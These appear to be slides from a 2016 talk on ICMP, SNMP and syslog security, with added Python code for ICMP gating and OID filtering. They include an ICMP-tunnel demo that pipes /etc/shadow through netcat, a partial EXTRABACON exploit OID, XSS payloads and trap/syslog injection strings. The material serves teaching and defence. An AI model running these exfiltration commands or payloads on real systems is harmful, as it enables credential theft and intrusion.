The Red Headed Step Children: ICMP, SNMP and other network management protocols Download: www.tavve.com/swd
Chuck Craft
Tavve Software
@bubbasnmp
16.09.28
Overview
• ICMP – Discovery/Recon, Covert Channel
• SNMP Polling - EXTRABACON
• SNMP Traps/Syslog – Cross-site Scripting
What I do
ICMP, SNMP, SNMPv3, syslog, TACACS, ssh, telnet, RDP, NTP, traps, NetFlow, Radius, https, sftp, scp, SIEM, NMS, NPM, DMZ, Air gap
Overview
• ICMP – Discovery/Recon, Covert Channel
• SNMP Polling - EXTRABACON
• SNMP Traps/Syslog – Cross-site Scripting
ICMP (Internet Control Message Protocol)
• RFC-792 – “ICMP, uses the basic support of IP as if it were a higher level protocol, however, ICMP is actually an integral part of IP, and must be implemented by every IP module.”
• Internet Protocol Number = 1 (TCP = 6, UDP = 17)
ICMP Header
Echo or Echo Reply Message
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Type | Code | Checksum | - used by all ICMP
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Identifier | Sequence Number | - varies by TYPE
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Data ... - varies by TYPE
+-+-+-+-+-
• Type (8 bits) x Code (8 bits) = 65,536 possible ICMP message formats
• Today talking about Type 8 (echo Request), Type 0 (echo Reply) and Type 11 (Time Exceeded)
• Other often seen messages = Type 3 (Destination Unreachable) and Type 5 (Redirect)
Whitehat ICMP
• Availability ("ping") – up/down – echo/reply
• Latency (Round Trip Time) – RFC-889
• Applications (eHealth, Solarwinds, ?) – ping before SNMP polling
• traceroute – path to host
• MTU roulette (packet size)
ICMP utilities – traceroute
• Default is to use UDP. Add "-I" flag to use ICMP ECHO.
• Microsoft "tracert" uses ICMP by default (no option to change protocol).
• Uses TTL (Time to Live) field in IP header. Originally seconds. Renamed to Hop Limit in IPv6.
# traceroute -I -n 8.8.8.8
traceroute to 8.8.8.8 (8.8.8.8), 30 hops max, 60 byte packets
 1  xxx.xxx.xxx.xxx  1.981 ms  2.943 ms  2.952 ms        <- Type 8 (echo) sent / Type 11 (Time Exceeded) received
 2  xxx.xxx.xxx.xxx  3.394 ms  3.404 ms  4.017 ms
 3  xxx.xxx.xxx.xxx  89.191 ms  89.221 ms  90.041 ms
 4  65.120.10.97  90.049 ms  90.050 ms  90.050 ms
 5  205.171.166.33  90.050 ms  117.057 ms  117.088 ms
 6  * * *                                                <- Type 8 (echo) sent / no response received
 7  209.85.143.188  112.775 ms  112.504 ms  112.270 ms
 8  209.85.143.61  111.980 ms  58.631 ms  58.264 ms
 9  209.85.244.209  83.153 ms  82.882 ms  99.668 ms
10  216.239.49.33  81.940 ms  81.332 ms  74.274 ms
11  * * *
12  8.8.8.8  208.090 ms  207.866 ms  205.455 ms          <- Type 8 (echo) sent / Type 0 (echo Reply) received
Blackhat ICMP
• How can attacker use ICMP for reconnaissance? – KoonYaw Tan (SANS), section 4 "Non-Conventional use": 4.1 Reconnaissance, 4.2 Denial of Service (DoS), 4.3 Covert Channel (https://www.sans.org/security-resources/idfaq/how-can-attacker-use-icmp-for-reconnaissance/3/13)
• Project Loki: ICMP Tunneling (http://phrack.org/issues/49/6.html)
• ICMP Usage in Scanning (Version 3.0, 2001) – Ofir Arkin
• ICMP based remote OS TCP/IP stack fingerprinting techniques (http://www.phrack.org/archives/issues/57/7.txt)
Unsolicited ICMP (nmap)
# nmap -v -A 192.168.200.50   (HP printer)
Destination Unreachable Message
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Type | Code | Checksum |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| unused |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Internet Header + 64 bits of Original Data Datagram |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Covert Channels / Exfil
• (extensible) Data Exfiltration Toolkit (DET) https://github.com/sensepost/DET
• Many ICMP tunnel programs.
https://en.wikipedia.org/wiki/ICMP_tunnel
icmptx – ICMP tunnel
CentOS install (current status of RepoForge / RPMForge ???):
# curl -O http://mirror.hmc.edu/repoforge/redhat/el6/en/x86_64/rpmforge/RPMS/icmptx-0.01-2.el6.rf.x86_64.rpm
# rpm -Uvh ./icmptx-0.01-2.el6.rf.x86_64.rpm
ARM/Kali (Debian) install:
- download code: https://github.com/jakkarth/icmptx
- icmptx.c: change tunnel ID from 7537 to 7530 (the ID travels in the ICMP Identifier field and must match on both ends)
/* run_icmp_tunnel(7537, mtu, !strcmp(argv[1],"-s"), argv[2], tun_fd); */
run_icmp_tunnel(7530, mtu, !strcmp(argv[1],"-s"), argv[2], tun_fd);
- build new binary with "make"
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Type | Code | Checksum |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Identifier | Sequence Number | - ID must match on both ends
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Data ...
+-+-+-+-+-
icmptx – Test setup
Client (-c = client) – xxx.xxx.xxx.233, CentOS 6.7 VM:
# icmptx -c 192.168.200.154
Created tunnel device: tun0
# ifconfig -a | grep -i tun
tun0      Link encap:UNSPEC  HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
# ifconfig tun0 inet 10.0.3.2 netmask 255.255.255.0
# netstat -nr
Kernel IP routing table
Destination     Gateway         Genmask         Flags   MSS Window  irtt Iface
10.0.3.0        0.0.0.0         255.255.255.0   U         0 0          0 tun0
xxx.xxx.xxx.0   0.0.0.0         255.255.255.0   U         0 0          0 eth0
169.254.0.0     0.0.0.0         255.255.0.0     U         0 0          0 eth0
0.0.0.0         xxx.xxx.xxx.1   0.0.0.0         UG        0 0          0 eth0
# cat /etc/shadow | nc 10.0.3.1 8023
# wc -c /etc/shadow
584 /etc/shadow

Server (-s = server) – xxx.xxx.xxx.154, Pi/ARM/Kali/Debian:
~/icmptx/icmptx-0.2# ./icmptx -s 192.168.200.154
# ifconfig -a | grep -i tun
tun0: flags=4240<POINTOPOINT,NOARP,MULTICAST>  mtu 1500
# ifconfig tun0 inet 10.0.3.1 netmask 255.255.255.0
# netstat -nr
Kernel IP routing table
Destination     Gateway         Genmask         Flags   MSS Window  irtt Iface
0.0.0.0         xxx.xxx.xxx.1   0.0.0.0         UG        0 0          0 eth0
10.0.3.0        0.0.0.0         255.255.255.0   U         0 0          0 tun0
xxx.xxx.xxx.0   0.0.0.0         255.255.255.0   U         0 0          0 eth0
# nc -l -p 8023
root:$6$MbrMNBHW$kNleGvjhRY6yRM<snip>:16908:0:99999:7:::
bin:*:15980:0:99999:7:::
daemon:*:15980:0:99999:7:::
adm:*:15980:0:99999:7:::
lp:*:15980:0:99999:7:::
sync:*:15980:0:99999:7:::
<snip>
The nc connection to 10.0.3.1:8023 rides entirely inside the Data field of ICMP echo / echo reply messages between the two hosts; on the wire the 584-byte shadow file is just "ping" traffic.
Trust No One – Verify All Received (Stateful FW or ICMP Proxy)
An inbound ICMP message is accepted only if matching outbound state is outstanding:
• Echo Reply (Type 0) – need an outstanding ICMP Type 8 with matching Identifier and Sequence Number
• Time Exceeded (Type 11) – need an outstanding outgoing packet matching the quoted Internet Header + 64 bits of Original Data Datagram (could be non-ICMP)
• Destination Unreachable (Type 3) – need an outstanding outgoing packet matching the quoted Internet Header + 64 bits of Original Data Datagram
(Message layouts, as in the RFC-792 diagrams above: Echo Reply = Type | Code | Checksum | Identifier | Sequence Number | Data...; Time Exceeded and Destination Unreachable = Type | Code | Checksum | unused | Internet Header + 64 bits of Original Data Datagram.)
Scrub outgoing ICMP data
(Slide diagram: internal nodes 10.10.10.10, 10.10.10.11 and 10.10.10.12 ping the external node 20.20.20.20 three ways – normal IP routing, a firewall that NATs the internal addresses to 20.20.20.10, and an ICMP proxy at 20.20.20.15.)
• Normal IP Routing – No data cleanup
• FW NATs internal – No data cleanup
• ICMP Proxy – Packet recreated. Options to maintain, replace or resize data field.
Internal Address Hiding
• Normal IP Routing – Request seen from 10.10.10.10
• FW NATs internal – Request seen from 20.20.20.10
• ICMP Proxy – Request seen from 20.20.20.15
Lock down nodes with ACLs (on the managed node 20.20.20.20)
• Normal IP Routing – Multiple ACL entries: 10.10.10.10, 10.10.10.11, 10.10.10.12
• FW NATs internal – One or more ACL entries (Static, Dynamic or Overload NAT?)
• ICMP Proxy – One ACL entry: 20.20.20.15
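The echo/covert-channel slides (icmptx carries its tunnel in the Data field and uses the Identifier as tunnel ID) and the "Trust No One" / "Scrub outgoing ICMP data" slides need the same packet code, so one added example serves both. It is not from the talk, from icmptx or from any Tavve product; it uses only the Python standard library and constructed packets. The addresses and the shadow-file fragment are taken from the slides purely as sample data, and the gate's matching rule for Type 3/11 (identification, protocol, addresses and the quoted 64 bits, ignoring TTL and header checksum) is my reading of "matching IP header and datagram", not something the talk specifies.

```python
# Added example (not from the talk, icmptx or any Tavve product): RFC 792 message
# building/parsing and a model of the "Trust No One" stateful gate described above.
import struct

ECHO_REPLY, DEST_UNREACH, ECHO_REQUEST, TIME_EXCEEDED = 0, 3, 8, 11

def icmp_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum of 16-bit words (odd length zero-padded)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF

def build_icmp(icmp_type: int, code: int, rest: bytes, data: bytes = b"") -> bytes:
    """Type | Code | Checksum | 4 bytes whose meaning varies by Type | Data."""
    rest = rest.ljust(4, b"\x00")[:4]
    csum = icmp_checksum(struct.pack("!BBH", icmp_type, code, 0) + rest + data)
    return struct.pack("!BBH", icmp_type, code, csum) + rest + data

def build_echo(ident: int, seq: int, data: bytes = b"", reply: bool = False) -> bytes:
    """Echo (Type 8) / Echo Reply (Type 0): the 4 bytes are Identifier, Sequence."""
    return build_icmp(ECHO_REPLY if reply else ECHO_REQUEST, 0,
                      struct.pack("!HH", ident, seq), data)

def parse_icmp(pkt: bytes) -> dict:
    """Split a message into fields; a correct message checksums to zero as a whole."""
    if len(pkt) < 8 or icmp_checksum(pkt) != 0:
        raise ValueError("short ICMP message or bad checksum")
    icmp_type, code, _csum, w1, w2 = struct.unpack("!BBHHH", pkt[:8])
    msg = {"type": icmp_type, "code": code, "data": pkt[8:]}
    if icmp_type in (ECHO_REQUEST, ECHO_REPLY):   # Identifier/Sequence only for echo
        msg["id"], msg["seq"] = w1, w2
    return msg

def datagram_key(quoted: bytes):
    """Key for 'Internet Header + 64 bits of Original Data Datagram': identification,
    protocol, src, dst and the first 8 payload bytes. TTL and header checksum are
    skipped on purpose: routers rewrite them before a Type 11 quotes the packet."""
    ihl = (quoted[0] & 0x0F) * 4 if quoted else 0
    if ihl < 20 or len(quoted) < ihl + 8:
        return None
    return quoted[4:6] + quoted[9:10] + quoted[12:20] + quoted[ihl:ihl + 8]

class IcmpGate:
    """Stateful firewall / ICMP proxy: inbound ICMP is admitted only if it answers
    something this side sent. scrub_len=None forwards echo Data unchanged; an
    integer recreates the packet with that many zero bytes (replace + resize)."""

    def __init__(self, scrub_len=0):
        self.scrub_len = scrub_len
        self.echo_pending = set()       # (peer, id, seq) of outstanding Type 8
        self.datagram_pending = set()   # keys of datagrams that may draw Type 3 / 11

    def outbound_echo(self, dst: str, pkt: bytes) -> bytes:
        msg = parse_icmp(pkt)
        if msg["type"] != ECHO_REQUEST:
            raise ValueError("only Echo Requests are forwarded outbound")
        self.echo_pending.add((dst, msg["id"], msg["seq"]))
        if self.scrub_len is None:
            return pkt
        # Packet recreated: an icmptx-style payload riding in Data never leaves.
        return build_echo(msg["id"], msg["seq"], b"\x00" * self.scrub_len)

    def outbound_datagram(self, datagram: bytes) -> None:
        self.datagram_pending.add(datagram_key(datagram))

    def inbound(self, src: str, pkt: bytes) -> bool:
        """True if the message matches outstanding state; unsolicited ICMP is dropped."""
        msg = parse_icmp(pkt)
        if msg["type"] == ECHO_REPLY:
            key = (src, msg["id"], msg["seq"])
            if key not in self.echo_pending:
                return False
            self.echo_pending.discard(key)   # one reply per request
            return True
        if msg["type"] in (DEST_UNREACH, TIME_EXCEEDED):
            key = datagram_key(msg["data"])
            return key is not None and key in self.datagram_pending
        return False   # inbound Echo Request, Redirect, ...: not accepted

def demo() -> dict:
    """Constructed traffic: an icmptx-style echo carrying /etc/shadow text, the reply
    to what really went out, a forged reply, and a router's Time Exceeded quoting a
    UDP datagram this side did send (the case traceroute relies on)."""
    gate = IcmpGate(scrub_len=8)
    secret = b"root:$6$MbrMNBHW$kNleGvjhRY6yRM"      # constructed, after the slide
    tunnel = build_echo(7530, 1, secret)             # icmptx: Identifier = tunnel ID
    wire = gate.outbound_echo("192.168.200.154", tunnel)
    good_reply = build_echo(7530, 1, parse_icmp(wire)["data"], reply=True)
    forged_reply = build_echo(4242, 9, b"unsolicited", reply=True)
    udp = b"\x82\x9a\x82\x9b\x00\x10\x00\x00abcdefgh"    # constructed UDP header + data
    # Minimal IPv4 header, no options, checksum 0: 10.10.10.10 -> 8.8.8.8, proto 17, TTL 1
    sent = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(udp), 0xBEEF, 0x4000, 1, 17, 0,
                       bytes([10, 10, 10, 10]), bytes([8, 8, 8, 8])) + udp
    gate.outbound_datagram(sent)
    quoted = sent[:8] + b"\x00" + sent[9:28]          # TTL rewritten in transit
    ttl_exceeded = build_icmp(TIME_EXCEEDED, 0, b"", quoted)   # 4 "unused" bytes = 0
    return {"payload_leaked": secret in wire,
            "scrubbed_len": len(parse_icmp(wire)["data"]),
            "good_reply": gate.inbound("192.168.200.154", good_reply),
            "forged_reply": gate.inbound("192.168.200.154", forged_reply),
            "time_exceeded": gate.inbound("205.171.166.33", ttl_exceeded)}
```

Run `demo()`: the shadow text never reaches the wire (the request is rebuilt with an 8-byte zero payload), the reply to that rebuilt request is admitted once, a reply with a different Identifier/Sequence is dropped, and the Time Exceeded is admitted even though it comes from a router rather than the destination, because what it quotes matches a datagram that was actually sent. Replies to the echo can still carry data back in, which is why the proxy option to replace or resize the Data field matters in both directions.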
Overview
• ICMP – Discovery/Recon, Covert Channel
• SNMP Polling - EXTRABACON
• SNMP Traps/Syslog – Cross-site Scripting
@bubbasnmp ???
• http://www.simple-times.org/
• Case, McCloghrie, Rose, Waldbusser et al
• Ask Dr. SNMP – Jeff Case: "That dog won't hunt."
SNMP Vulnerabilities - 2002
http://www.simple-times.org/pub/simple-times/issues/10-1.html
The Quarterly Newsletter of SNMP Technology, Comment, and Events
Volume 10, Number 1 - December, 2002
The Story Behind the SNMP Vulnerabilities
Tiina Havana, OUSPG / Ari Takanen, OUSPG (University of Oulu - Finland)
“SNMP is an old and mature protocol with numerous vendors providing solutions for it and even more numerous parties providing critical services over it.”
"SNMP is also a complex protocol using an error prone ASN.1 encoding and containing various error prone data types over an unreliable network environment (UDP)."
“…. it was possible to prove that SNMP implementations were vulnerable and could be exploited if wanted.”
Shadow Brokers - 2016
“The new SNMP flaw, ….” “…. buffer overflow vulnerability”
“While Cisco has said all versions of ASA are affected by the underlying vulnerability in the Simple Network Messaging Protocol, the finding means that ExtraBacon poses a bigger threat than many security experts may have believed.”
EXTRABACON
https://blogs.cisco.com/security/shadow-brokers
“The EXTRABACON exploit targets a buffer overflow vulnerability in the SNMP code of the Cisco ASA, Cisco PIX, and Cisco Firewall Services Module.” “An attacker could exploit this vulnerability by sending crafted SNMP packets to an affected Cisco product.”
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160817-asa-snmp
“The attacker requires knowledge of the configured SNMP community string in SNMP version 1 and SNMP version 2c or a valid username and password for SNMP version 3.”
SNMP Agent / MIB
• SNMP: Simple Network Management Protocol
• MIB: Management Information Base
• Objects in MIB are addressed by OID (Object Identifier)
• SNMPv1, SNMPv2c: cleartext community string
• SNMPv3: more secure – encryption [1], time sensitive, engine IDs
(Slide diagram: the Mgmt Server runs the SNMP Manager; the Managed Node runs the SNMP Agent, which holds the MIB and listens on UDP 161. Manager -> Agent: snmpget, snmpset. Agent -> Manager: snmpget response, and asynchronous traps to UDP 162.)
[1] https://www.sans.org/reading-room/whitepapers/networkdevs/securing-snmp-net-snmp-snmpv3-1051
SNMP MIB tree / OIDs – dot(.) notation
ccitt(0)  iso(1)  joint-iso-ccitt(2)
  iso(1): std(0)  reg authority(1)  member body(2)  org(3)
    org(3): dod(6)
      dod(6): internet(1)
        internet(1): directory(1)  mgmt(2)  experimental(3)  private(4)
          mgmt(2): mib-2(1)
            mib-2(1): system(1)  interfaces(2)  at(3)  ip(4)  icmp(5)  tcp(6)  udp(7)  egp(8) ...
              system(1): sysDescr(1)  sysObjectID(2)  sysUptime(3)  sysContact(4)  sysLocation(5) ...
iso.org.dod.internet.mgmt.mib-2.system.sysDescr = 1.3.6.1.2.1.1.1
sysDescr.0 = .1.3.6.1.2.1.1.1.0 = "TAVVE ZoneRanger v5.5"
SNMP Private Enterprises – dot(.) notation
ccitt(0)  iso(1)  joint-iso-ccitt(2)
  iso(1): std(0)  reg authority(1)  member body(2)  org(3)
    org(3): dod(6)
      dod(6): internet(1)
        internet(1): directory(1)  mgmt(2)  experimental(3)  private(4)
          private(4): enterprises(1)
            enterprises(1): Reserved(0)  NxNetworks(1)  IBM(2)  CMU(3) ...  Cisco(9)  HP(11)
iso.org.dod.internet.private.enterprises = 1.3.6.1.4.1, so Cisco = 1.3.6.1.4.1.9
A very long OID under the Cisco enterprise arc (output omitted):
oid = <ASN1_OID['.1.3.6.1.4.1.9.9.491.1.3.3.1.1.5.9.95.184.57.47.5.173.53.165
.165.165.165.131.236.4.137.4.36.137.229
*** output omitted ****
44.144.144.144.144.144.144.141.123.131.9.139.124.36.20.139.7.255.224.144']>
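Added example, not from the talk and not the code of any NMS or proxy product: OBJECT IDENTIFIER encoding as SNMP puts it on the wire (X.690 BER), the RFC 2578 limits (at most 128 sub-identifiers, each at most 2^32-1) that a "verify meets RFC" step would enforce before the packet is rebuilt, and an arc-wise subtree allow-list of the kind the SNMP proxy slides further down mean by "Filter OIDs". The long test OID is only the leading arcs of the Cisco enterprise OID shown above; nothing of the omitted remainder is reconstructed.

```python
# Added example (not from the talk or any product): BER OID encode/decode with the
# RFC 2578 limits, and subtree filtering done arc by arc rather than by string prefix.
OID_TAG = 0x06
MAX_SUBIDS, MAX_SUBID = 128, 2 ** 32 - 1   # RFC 2578 section 7.1.3 limits for SNMP

def _ber_length(n: int) -> bytes:
    """Short form below 128; long form 0x8N followed by N length bytes above."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body

def _parse_length(data: bytes, pos: int):
    first = data[pos]
    if first < 0x80:
        return first, pos + 1
    count = first & 0x7F
    if count == 0 or pos + 1 + count > len(data):
        raise ValueError("indefinite or truncated length")
    return int.from_bytes(data[pos + 1:pos + 1 + count], "big"), pos + 1 + count

def oid_arcs(dotted: str) -> list:
    """'.1.3.6.1.2.1' -> [1, 3, 6, 1, 2, 1], checking the first-arc rules."""
    arcs = [int(a) for a in dotted.strip(".").split(".")]
    if len(arcs) < 2 or arcs[0] > 2 or (arcs[0] < 2 and arcs[1] > 39):
        raise ValueError("not a valid OID: %s" % dotted)
    return arcs

def encode_oid(dotted: str) -> bytes:
    """BER: tag, length, then base-128 subidentifiers with continuation bits."""
    arcs = oid_arcs(dotted)
    body = bytearray()
    # The first two arcs share one subidentifier: 40*X + Y, so iso(1).org(3) is 0x2B.
    for sub in [arcs[0] * 40 + arcs[1]] + arcs[2:]:
        chunk = [sub & 0x7F]             # low 7 bits last; earlier bytes carry bit 7
        sub >>= 7
        while sub:
            chunk.append(0x80 | (sub & 0x7F))
            sub >>= 7
        body.extend(reversed(chunk))
    return bytes([OID_TAG]) + _ber_length(len(body)) + bytes(body)

def decode_oid(data: bytes, pos: int = 0):
    """Return (dotted OID, position after it); rejects malformed or oversize OIDs."""
    if pos >= len(data) or data[pos] != OID_TAG:
        raise ValueError("expected OBJECT IDENTIFIER tag")
    length, pos = _parse_length(data, pos + 1)
    end = pos + length
    if length == 0 or end > len(data):
        raise ValueError("empty or truncated OID")
    subs, value, pending = [], 0, False
    for b in data[pos:end]:
        value = (value << 7) | (b & 0x7F)
        pending = bool(b & 0x80)
        if not pending:
            if value > MAX_SUBID:
                raise ValueError("subidentifier exceeds 2^32-1")
            subs.append(value)
            value = 0
    if pending:
        raise ValueError("OID ends inside a subidentifier")
    first = subs[0]
    x = 2 if first >= 80 else first // 40
    arcs = [x, first - 40 * x] + subs[1:]
    if len(arcs) > MAX_SUBIDS:
        raise ValueError("more than %d subidentifiers" % MAX_SUBIDS)
    return "." + ".".join(str(a) for a in arcs), end

def is_well_formed_oid(data: bytes) -> bool:
    """What a proxy's 'verify meets RFC' step answers before forwarding a varbind."""
    try:
        decode_oid(data)
        return True
    except (ValueError, IndexError):
        return False

def oid_allowed(dotted: str, allowed_subtrees) -> bool:
    """Arc-wise prefix match: .1.3.6.1.2.1 allows .1.3.6.1.2.1.1.1.0 but not
    .1.3.6.1.2.10.x, which a naive string prefix test would let through."""
    arcs = oid_arcs(dotted)
    for subtree in allowed_subtrees:
        prefix = oid_arcs(subtree)
        if arcs[:len(prefix)] == prefix:
            return True
    return False
```

With an allow-list of just mib-2 (`.1.3.6.1.2.1`), an outbound request for sysDescr.0 passes and anything under `enterprises.cisco` (`.1.3.6.1.4.1.9`) is refused before it reaches the agent, which is the shape of control the proxy slides describe; the 128-subidentifier and 2^32-1 checks are the RFC-2578 part of "verify meets RFC", not a claim about how any particular exploit is detected.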
Buffer Overflow
int add_num(char num1, char num2) {
    char stuff[100];        /* 100-byte local buffer on the stack */
    char num_total;
    stuff[200] = 99;        /* index 200 is past the end of stuff: the write lands outside the frame */
    num_total = num1 + num2;
    return num_total;
}
add_num:
        @ args = 0, pretend = 0, frame = 112
        @ frame_needed = 1, uses_anonymous_args = 0
        @ link register save eliminated.
        push    {r7}
        sub     sp, sp, #116            @ local variables allocated (116-byte frame)
        add     r7, sp, #0
        mov     r3, r0
        mov     r2, r1
        strb    r3, [r7, #7]
        mov     r3, r2
        strb    r3, [r7, #6]
        movs    r3, #99
        strb    r3, [r7, #208]          @ write to La La Land: offset 208 is beyond the 116-byte frame
        ldrb    r2, [r7, #7]
        ldrb    r3, [r7, #6]
        add     r3, r3, r2
        strb    r3, [r7, #111]
        ldrb    r3, [r7, #111]          @ zero_extendqisi2
        mov     r0, r3
        adds    r7, r7, #116
        mov     sp, r7
        @ sp needed
        ldr     r7, [sp], #4
        bx      lr
Scrub outgoing SNMP data
(Slide diagram, same layout as for ICMP: internal management servers 10.10.10.10, 10.10.10.11 and 10.10.10.12 poll the external managed node 20.20.20.20 via normal IP routing, via a firewall that NATs the internal addresses to 20.20.20.10, or via an SNMP proxy at 20.20.20.15.)
• Normal IP Routing – No data cleanup
• FW NATs internal – No data cleanup
• SNMP Proxy – Packet recreated. Verify meets RFC. Filter OIDs.
SNMPv3 (encryption)
• Normal IP Routing – Mgmt. apps must support SNMPv3
• FW NATs internal – Mgmt. apps must support SNMPv3
• SNMP Proxy – Proxy can translate v1, v2c -> SNMPv3
Internal Address Hiding
• Normal IP Routing – Request seen from 10.10.10.10
• FW NATs internal – Request seen from 20.20.20.10
• SNMP Proxy – Request seen from 20.20.20.15
Lock down nodes with ACLs (on the managed node 20.20.20.20)
• Normal IP Routing – Multiple ACL entries: 10.10.10.10, 10.10.10.11, 10.10.10.12
• FW NATs internal – One or more ACL entries (Static, Dynamic or Overload NAT?)
• SNMP Proxy – One ACL entry: 20.20.20.15
Overview
• ICMP – Discovery/Recon, Covert Channel
• SNMP Polling - EXTRABACON
• SNMP Traps/Syslog – Cross-site Scripting
Cross-Site Scripting (XSS)
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
"Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it."
Examples:
<script>alert("TEST");</script>
<body onload=alert('test1')>
<img src=http://badsite.net/gotya.swf>
<IMG SRC=jAvascript:alert('test2')> (a=A (UTF-8))
Data Validation
(https://twitter.com/sempf/status/514473420277694465) (https://www.sempf.net/post/On-Testing1.aspx)
Rapid7 Research
Rapid7 Identifier  CVE Identifier  Class          Vendor     Patched
R7-2016-11.1       CVE-2016-5073   XSS            CloudView  Version 2.10a
R7-2016-11.2       CVE-2016-5073   XSS            Cloudview  Version 2.10a
R7-2016-11.3       CVE-2016-5074   Format String  Cloudview  Version 2.10a
R7-2016-11.4       CVE-2016-5075   XSS            Cloudview  Version 2.10a
R7-2016-11.5       CVE-2016-5076   DOA            Cloudview  Version 2.10a
R7-2016-12         CVE-2016-5077   XSS            Netikus    Version 3.2.1.44
R7-2016-13         CVE-2016-5078   XSS            Paessler   Version 16.2.24.4045
R7-2016-14.1       CVE-2016-5642   XSS            Opmantek   Versions 8.5.12G
R7-2016-14.2       CVE-2016-5642   XSS            Opmantek   Versions 8.5.12G, 4.3.7c
R7-2016-14.3       CVE-2016-5642   XSS            Opmantek   Versions 8.5.12G, 4.3.7c
R7-2016-14.4       CVE-2016-6534   Cmd Injection  Opmantek   Versions 8.5.12G, 4.3.7c
(https://community.rapid7.com/community/infosec/blog/2016/09/07/multiple-disclosures-for-multiple-network-management-systems-part-2)
Deral Heiland, Matthew Kienow – Managed to Mangled: Exploitation of Enterprise Network Management Systems (https://www.derbycon.com/events/managed-to-mangled-exploitation-of-enterprise-network-management-systems/) SNMP Data Harvesting During Penetration Testing - May 4, 2016 (https://community.rapid7.com/community/services/blog/2016/05/05/snmp-data-harvesting-during-penetration-testing)
Simple Network Management Protocol (SNMP) Best Practices - Jan 27, 2016 (https://community.rapid7.com/community/services/blog/2016/01/27/simple-network-management-protocol-snmp-best-practices)
Example string
# ./snmpRequest -p TRAP -v 2c 192.168.200.133/162 \
    "1.3.6.1.2.1.1.3.0={t}0" \
    "1.3.6.1.6.3.1.1.4.1.0={o}1.3.6.1.4.1.9.0.1" \
    "1.3.6.1.6.3.1.1.4.1.0={s}\<src=http://181.224.145.117/wp-content/uploads/2015/11/tavve_logo.gif.gif/\>"
snmpRequest is a wrapper for snmp4j.jar
# ./java -jar /root/syslog4j-0.9.46-bin.jar -h 192.168.200.133 udp \
    "\<src=http://181.224.145.117/wp-content/uploads/2015/11/tavve_logo.gif.gif/\>"
Good Apps
The varbind is displayed as text: the angle brackets are HTML-encoded and the URL inside is auto-linked, so nothing is parsed as a tag:
snmpTrapOID.0=<src=<span class='eventHref'>http://181.224.145.117/wp-content/uploads/2015/11/tavve_logo.gif.gif/</span>>
Bad App
/var/www/html/cgi-bin# cat showlog
#!/bin/sh
echo "<HTML>"
echo "Last 100 lines of /var/log/syslog:<br><pre>"
date
date | sed -e "s/./-/g"
/usr/bin/tail -n 100 /var/log/syslog 2>&1
echo "</BODY></HTML>"
http://xxx.xxx.xxx.xxx/cgi-bin/showlog
Last 100 lines of /var/log/syslog:
Sun Sep 25 02:59:06 UTC 2016
----------------------------
Sep 25 01:49:12 kali lighttpd[7303]: Syntax OK
Sep 25 01:49:12 kali systemd[1]: Started Lighttpd Daemon.
Sep 25 01:49:12 kali lighttpd[7311]: 2016-09-25 01:49:12: (plugin.c.183) Cannot load plugin mod_accesslog more than once, please fix your config (lighttpd may not accept such configs in future releases)
Sep 25 01:49:12 kali lighttpd[7311]: 2016-09-25 01:49:12: (plugin.c.183) Cannot load plugin mod_cgi more than once, please fix your config (lighttpd may not accept such configs in future releases)
Sep 25 01:49:12 kali lighttpd[7311]: 2016-09-25 01:49:12: (plugin.c.183) Cannot load plugin mod_status more than once, please fix your config (lighttpd may not accept such configs in future releases)
Sep 25 01:49:44 kali systemd[1]: Stopping Lighttpd Daemon...
Sep 25 01:49:44 kali systemd[1]: Stopped Lighttpd Daemon.
<snip>
Bad App Results
<snip>
Sep 25 02:34:03 kali lighttpd[8372]: /usr/bin/tail: cannot open '/var/log/messages' for reading: Permission denied
Sep 25 02:34:34 kali lighttpd[8372]: /usr/bin/tail: cannot open '/var/log/messages' for reading: Permission denied
Sep 25 02:34:58 kali lighttpd[8372]: cat: /var/log/messages: Permission denied
Sep 25 02:35:01 kali CRON[8455]: (root) CMD (command -v debian-sa1 > /dev/null && debian-sa1 1 1)
Sep 25 02:38:30 kali lighttpd[8372]: /usr/bin/tail: cannot open '/var/log/messages' for reading: Permission denied
